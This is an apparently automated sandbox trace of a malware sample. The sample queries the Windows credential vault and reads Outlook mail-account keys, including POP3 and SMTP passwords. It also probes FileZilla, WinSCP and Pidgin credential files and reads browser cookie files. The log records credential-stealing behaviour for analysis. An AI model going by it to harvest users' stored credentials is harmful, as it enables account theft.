Module Get Address module_name = c:\windows\syswow64\vaultcli.dll, function = VaultGetItem, address_out = 0x73503242 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer, value_name = Version, data = 8.0.7601.17514, type = REG_SZ True 1
COM Create interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\05cb6f136411cf4daf1f74e966b0a7dc True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\05cb6f136411cf4daf1f74e966b0a7dc False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4b62e5f8c092a64ea9b79fd559a5a15e True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\4b62e5f8c092a64ea9b79fd559a5a15e False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\609a848a708f544697003a34105400ef True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\609a848a708f544697003a34105400ef False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\63cba20b08018a458b6edb5d87fb54da True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\63cba20b08018a458b6edb5d87fb54da False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\828cd3a417cead4ab3a214070dce1c3d True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\828cd3a417cead4ab3a214070dce1c3d False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\88d17fec23cbdd4fb54ad1d34c0dce09 True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\88d17fec23cbdd4fb54ad1d34c0dce09 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = Email, data = 0, type = REG_NONE False 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = Email, data = 0, type = REG_NONE False 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = Email, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Server, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = Email, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 User, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Server, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Port, data = 0, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 Password, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = IMAP Server, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP Server, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = Email, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP User, data = 0, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP Server, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP Port, data = 0, type = REG_NONE False 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP Password, data = 0, type = REG_NONE False 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004, value_name = Email, data = 0, type = REG_NONE False 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a533ec91a4f74549ac2130b6908c8aac True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\a533ec91a4f74549ac2130b6908c8aac False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b70c659765f94740b657fee657d05ab4 True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b70c659765f94740b657fee657d05ab4 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\cce6b8ce16bac4458e5e40e3530d6f1d True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\cce6b8ce16bac4458e5e40e3530d6f1d False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dd7f40a823cda64b92e9a96e9e46e406 True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\dd7f40a823cda64b92e9a96e9e46e406 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} True 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary, value_name = Email, data = 0, type = REG_NONE False 1
Registry Enumerate Keys reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E} False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\filezilla\recentservers.xml, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\filezilla\recentservers.xml, type = file_attributes False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\filezilla\recentservers.xml, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\ False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\.purple\accounts.xml, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\.purple\accounts.xml, type = file_attributes False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\.purple\accounts.xml, desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt, size = 83, size_out = 83 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt, size = 551, size_out = 551 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt, size = 241, size_out = 241 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt, size = 111, size_out = 111 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt, size = 110, size_out = 110 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt, size = 276, size_out = 276 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt, size = 86, size_out = 86 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt, size = 414, size_out = 414 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
File Get Info filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt, type = size, size_out = 0 True 1
File Read filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt, size = 414, size_out = 414 True 1
File Create filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
